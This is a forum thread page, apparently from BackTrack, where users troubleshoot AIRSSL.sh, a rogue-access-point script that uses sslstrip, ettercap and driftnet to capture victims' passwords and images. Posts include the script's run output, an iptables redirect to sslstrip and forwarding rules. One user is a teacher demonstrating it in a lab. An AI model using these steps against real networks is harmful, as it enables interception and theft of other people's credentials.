Page 2 of 9 FirstFirst 1234 ... LastLast
Results 11 to 20 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #11
    Just burned his ISO
    Join Date
    May 2010
    Posts
    7

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    this script needs work. at0 interface is hardcoded everywhere

  2. #12
    Just burned his ISO
    Join Date
    May 2010
    Posts
    7

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    actually, my bad. at0 is made by airbase.
    Nevermind.

    Script works, I added

    airmon-ng stop mon0
    airmon-ng stop $fakeap_interface

    after iptables --table nat --delete-chain

  3. #13
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I'm trying this script on ubuntu, i think there are no differences, dhcp started manually says it can't read the config file, i've tried to make it 777 but same error, permission denied..any clue?

  4. #14
    Just burned his ISO
    Join Date
    May 2010
    Posts
    6

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by alex88 View Post
    I'm trying this script on ubuntu, i think there are no differences, dhcp started manually says it can't read the config file, i've tried to make it 777 but same error, permission denied..any clue?
    I believe you are referring to the /var/run/dhcpd.pid file. Try setting the permissions on the /var/run folder.

  5. #15
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default

    Linux flavor should not matter, providing the other modules can be called. The script forcefully creates a working directory to use then writes its own dhcpd conf file, it should (and does for me) work fine with the permission denied error.

    Quote Originally Posted by lonypny View Post
    this script needs work. at0 interface is hardcoded everywhere


    Quote Originally Posted by mrkazu View Post
    Hi, nice script, however i had to add two lines to get it to work for me (red text is the new line)

    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan1: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID


    airmon-ng start $fakeap_interface
    fakeap_interface="mon0"


    might help someone else having trubble with it
    Does airbase-ng not create a virtual dev itself?
    Anyhow thanks for the contribution hopefully it helps more users, however I dont think the script should be changed, because changing the fakeap_interface variable to a constant, that being mon0, will cause other problems, ie when mon0 is not what is created.

    UPDATE AIRSSL 2.0 now uses the rtl8187 driver and thus uses mon0, it would be a smart idea to make sure mon0 is being used solely for this script and doesn't have much else going on.
    Last edited by killadaninja; 11-20-2010 at 06:52 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  6. #16
    Junior Member
    Join Date
    Aug 2009
    Posts
    37

    Thumbs up Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    When I run it every thing initiates but the fake AP essid is hidden?
    I get this error message when DHCP starts
    Can't create PIDfile /var/run/dhcpd.pid: permission denied.
    Also does the etter.conf file have to be default or with the comments removed?
    Thanks.

  7. #17
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    3

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi, i just want to start by saying thank you killadaninja for making such a nice script, however, i'm having some trouble acquiring an ip address on my 'victim' machine and it ends up giving me limited or no connectivity here is what i am running.

    Code:
    root@bt:~# netstat -nr
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
    192.168.0.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0
    0.0.0.0         192.168.0.1     0.0.0.0         UG        0 0          0 eth0
    root@bt:~# ./airssl.sh
    
    AIRSSL 1.0 - killadaninja
    
    Enter the networks gateway IP address, for example 192.168.1.254: 192.168.0.1
    Enter your interface thats connected to the internet, for example wlan0: eth0
    Enter your interface to be used for the fake AP, for example wlan1: wlan0
    Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: Test
    [+] Configuring FakeAP....
    
    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, choose n if your are unsure... y or n
    n
    
    [+] Starting FakeAP...
    [+] Configuring forwarding tables...
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...
    
    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n
    n
    
    [+] Starting ettercap...
    
    [+] Driftnet?
    
    Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n
    n
    
    
    
    [+] Activated...
    Airssl is now running, after victim connects and surfs, their credentials
    will be displayed in ettercap. You may use right/left mouse buttons
    to scroll up/down ettercaps xterm shell, ettercap will also save its output
    to /pentest/wireless/airssl/passwords unless you stated otherwise.
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata
    
    [+] IMPORTANT...
    After you have finished please close airssl and clean up properly by hitting y,
    if airssl is not closed properly ERRORS WILL OCCUR
    Thanks in advance

    Jonathan
    Last edited by JoniBrook; 06-18-2010 at 02:35 PM. Reason: Typo

  8. #18
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by {LCD}STELIOS View Post
    When I run it every thing initiates but the fake AP essid is hidden?
    I get this error message when DHCP starts
    Can't create PIDfile /var/run/dhcpd.pid: permission denied.
    Also does the etter.conf file have to be default or with the comments removed?
    Thanks.

    I cannot understand, after having a quick look, why the fake AP essid would be hidden, makes no sense.
    Has for PID files, there useless imho and, at least in this circumstance, definitely not needed.
    etter.conf should be default, I have added this to my original post thank you.



    Quote Originally Posted by JoniBrook View Post
    Hi, i just want to start by saying thank you killadaninja for making such a nice script, however, i'm having some trouble acquiring an ip address on my 'victim' machine and it ends up giving me limited or no connectivity here i what i am running.

    Thanks in advance

    Jonathan
    Is the victim a virtual machine? If victim is a physical box then what O.S is it running, if it is windows then run the script and connect as usual, whilst all is up and running on the linux machine do an "ifconfig", and on the win box do a "ipconfig /all" and print both results here, so we can see whats going on.
    Thank you for taking the time to say thanks.

    PS you etter.conf is original correct? maybe you altered your etter.conf to tell it to ipforward?
    Last edited by killadaninja; 06-18-2010 at 11:11 AM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  9. #19
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    1

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hello,

    I have been able to set it up and get it to work at home. However when I'm trying to show a demonstration to my students in the lab, I am not able to access to the internet from the client laptop.

    I tried removing the line:
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I am still unable to access the internet. And when I sniff the network with wireshark I get an ICMP packet right after the DNS query that looks like this:
    Code:
    Source            Destination         Protocol      Info
    10.0.0.28         10.0.0.1            DNS           Standard query A google.com
    10.0.0.1          10.0.0.28           ICMP          Destination Unreachable (Port unreachable)
    I've searched around and found different iptables forwarding options which seem to bypass this issue:
    Code:
    sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
    iptables -X
    iptables -F
    iptables -A FORWARD -i wlan0 -o eth0 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    from: http://www.backtrack-linux.org/forum...lan0-eth0.html

    This allowed me to connect to the fake access point and get transparent access to the internet. However, sslstrip did not work obviously since it monitors port 10000.

    I have tried sslstrip to monitor port 443 but that did not work either. I'm sure there is something I am missing. I'm not very well versed in iptables where I think the problem could be (and where it could be fixed).

    Is there a way to get sslstrip to work with this iptables set up? Or do you recommend I bridge at0 and wlan1 (internet access device) as an alternate solution (if that would even work)?
    Last edited by ntheother; 07-08-2010 at 01:46 PM.

  10. #20
    Just burned his ISO
    Join Date
    Jul 2010
    Location
    In a tree
    Posts
    4

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Everythings works exepted for the DHCP, i added the two lines in the script, and still can't get an ip.
    If i look at the pakets traffic in the wireless settings, i can see that it's recieving anything ...

    Even if the dhcp serv seems to send him an ip.

    My router is a Netgear also set to be a dhcp. may it cause troubles ?

    Can someone help me ?

    Thanx

Page 2 of 9 FirstFirst 1234 ... LastLast

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  3. sslstrip with ettercap or airspoof not capturing password
    By danielgc in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 08-29-2009, 10:29 PM
  4. Capturing passwords on a big LAN!
    By dxi5t in forum OLD Pentesting
    Replies: 5
    Last Post: 06-10-2008, 05:05 PM
  5. Wifiopn-cap: automated OPN Network capturing script
    By teknecal in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 04-21-2008, 01:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •